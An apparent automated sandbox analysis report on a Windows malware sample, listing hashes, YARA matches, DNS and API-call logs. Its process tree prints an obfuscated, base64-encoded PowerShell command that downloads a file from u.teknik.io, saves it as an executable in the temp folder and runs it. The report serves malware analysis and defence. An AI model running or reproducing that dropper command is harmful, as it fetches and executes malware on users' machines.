Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	April 13, 2021, 4:10 p.m.	April 13, 2021, 4:12 p.m.

Size	847.5KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`9fbd32c6bb25f6a660696fa9830c5040`
SHA256	`5de2819f832f06f69009b07779eacabc1b171540b10689b4b23eaac8f3232e14`
CRC32	`9477927D`
ssdeep	`24576:8AHnh+eWsN3skA4RV1Hom2KXMmHadhp5:bh+ZkldoPK8YadJ`
Yara	PE_Header_Zero - PE File Signature Zero OS_Processor_Check_Zero - OS Processor Check Signature Zero Process_Snapshot_Kill_Zero - Process Kill Zero Device_Check_Zero - Device Check Zero CryptGenKey_Zero - CryptGenKey Zero FindFirstVolume_Zero - FindFirstVolume Zero inject_thread - Code injection with CreateRemoteThread in a remote process network_http - Communications over HTTP escalate_priv - Escalade priviledges screenshot - Take screenshot keylogger - Run a keylogger win_registry - Affect system registries win_token - Affect system token win_files_operation - Affect private profile Str_Win32_Winsock2_Library - Match Winsock 2 API library declaration Str_Win32_Wininet_Library - Match Windows Inet API library declaration Str_Win32_Internet_API - Match Windows Inet API call Str_Win32_Http_API - Match Windows Http API call IsPE32 - (no description) IsWindowsGUI - (no description) HasDebugData - DebugData Check HasRichSignature - Rich Signature Check AutoIt - www.autoitscript.com/site/autoit/

pkM3T.jpg "C:\Users\test22\AppData\Local\Temp\pkM3T.jpg"
2616
- powershell.exe powershell.exe PowERsHEL`l -ExecutionPolicy Bypass -w 1 /`e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AMgA4AG8ATABXAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAZQBWAEQAdwBBAEMAQgB0AHAAVwAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABlAFYARAB3AEEAQwBCAHQAcABXAC4AZQB4AGUAHSA=
  4864
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AMgA4AG8ATABXAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAZQBWAEQAdwBBAEMAQgB0AHAAVwAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABlAFYARAB3AEEAQwBCAHQAcABXAC4AZQB4AGUAHSA=
    4372
    - eVDwACBtpW.exe "C:\Users\test22\AppData\Local\Temp\eVDwACBtpW.exe"
      4716

Name	Response	Post-Analysis Lookup
u.teknik.io	A 5.79.72.163 CNAME teknik.io	5.79.72.163

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.217.25.14	Active	Moloch
5.79.72.163	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (13 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 13, 2021, 4:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 13, 2021, 4:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 13, 2021, 4:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 13, 2021, 4:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 13, 2021, 4:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 13, 2021, 4:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 13, 2021, 4:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 13, 2021, 4:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 13, 2021, 4:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 13, 2021, 4:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 13, 2021, 4:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 13, 2021, 4:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 13, 2021, 4:10 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 13, 2021, 4:10 p.m.			0	0
IsDebuggerPresent April 13, 2021, 4:10 p.m.			0	0
IsDebuggerPresent April 13, 2021, 4:10 p.m.			0	0

Uses Windows APIs to generate a cryptographic key (50 out of 80 events)

Time & API	Arguments	Status	Return
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00201960 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00201ee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00201ee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00201ee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002020e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002020e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002020e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002020e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002020e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002020e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00201920 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00201920 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00201920 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00201ee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00201ee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00201ee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00201520 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00201ee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00201ee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00201ee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00201ee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00201ee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00201ee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00201ee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00202260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00202260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00202260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00202260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00202260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00202260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00202260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00202260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00202260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00202260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00202260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00202260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00202260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00202260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002021a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002021a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038d108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038db08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038db08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038db08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038d1c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038d1c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038d1c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038d1c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038d1c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 13, 2021, 4:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038d1c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 13, 2021, 4:10 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header

suspicious_request

GET https://u.teknik.io/28oLW.jpg

Performs some HTTP requests (1 event)

request

GET https://u.teknik.io/28oLW.jpg

Allocates read-write-execute memory (usually to unpack itself) (50 out of 272 events)

Time & API	Arguments	Status
NtProtectVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02640000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02650000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fc91000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0270a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fc92000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02702000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02712000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02651000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02652000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0273a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02713000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02714000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0274b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02747000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0270b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02732000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02745000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02715000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0273c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02716000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0274c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02733000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02734000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02735000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02736000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02737000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02738000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02739000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05010000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05011000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05012000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05013000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05014000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05015000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05016000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05017000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05018000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05019000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0501a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0501b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0501c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0501d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0501e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0501f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05020000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05021000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05022000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
